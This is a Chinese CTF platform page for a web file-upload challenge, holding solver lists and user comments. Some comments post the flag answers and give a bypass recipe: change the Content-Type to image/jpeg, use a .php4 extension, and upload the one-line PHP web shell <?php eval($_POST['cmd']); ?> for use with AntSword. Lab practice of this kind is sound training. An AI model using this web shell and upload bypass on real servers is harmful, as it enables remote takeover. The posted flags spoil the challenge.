文件上传WEB 未解决

分数: 35 金币: 4
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2865
提  示:
描  述:
文件上传
评论
jingquesec 6天前

flag{01b6ad6be2af70f83f2c9282ad8d34c1}

回复 0

Wchzzz 2月前

怎么连上去打不开flag啊

回复 0

1004025151 2月前

flag{de5fd002182dd65121054872ac5570f0}

回复 0

冯飞99 5月前

这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁🗡直接连接,记得把代理关掉,不然不成功。

回复 0

zzccbb2005 6月前

1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录

回复 0

wjx2958958 6月前

这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了

回复 0

ACHEN8899 6月前

蚁剑连不上是什么原因啊?

回复 0

XRain 7月前

黑盒测出来也是有可能的,就是在请求头里面改改改,然后仔细观察返回的信息有什么差别。

回复 0

XRain 7月前

其实, php 后缀的检测机制跟其他后缀如 txt 的不一样,这点是能测出来的,因为 php、php1 和 1php 这些后缀都是返回 invalid file,像 txt、aaa 这种就返回 give me a image file not a php。所以,包含 php 的检测至少用了 strpos() 做判断。我也只测到这种程度,修改 Content-Type 真想不到。

回复 1

GET-lee 9月前

没任何提示

回复 0

WriteUp

image
harry

4 金币

评分(17)

解题动态

to5ny 攻破了该题 17小时前
2324291123 攻破了该题 20小时前
lilac 攻破了该题 1天前
player33 攻破了该题 2天前
xiuliyeer1 攻破了该题 3天前
FUCK123 攻破了该题 3天前
MorstarDust 攻破了该题 4天前
jingquesec 攻破了该题 6天前
cbojue 攻破了该题 8天前
uohz15 攻破了该题 8天前
liao1314 攻破了该题 10天前
OldWolfofFarron 攻破了该题 11天前
caigou123 攻破了该题 12天前
lotuswhite 攻破了该题 14天前
coolsword2023 攻破了该题 14天前
ey0272 攻破了该题 15天前
haha888 攻破了该题 16天前
18713476188jiang 攻破了该题 17天前
111jing 攻破了该题 19天前
sstt 攻破了该题 21天前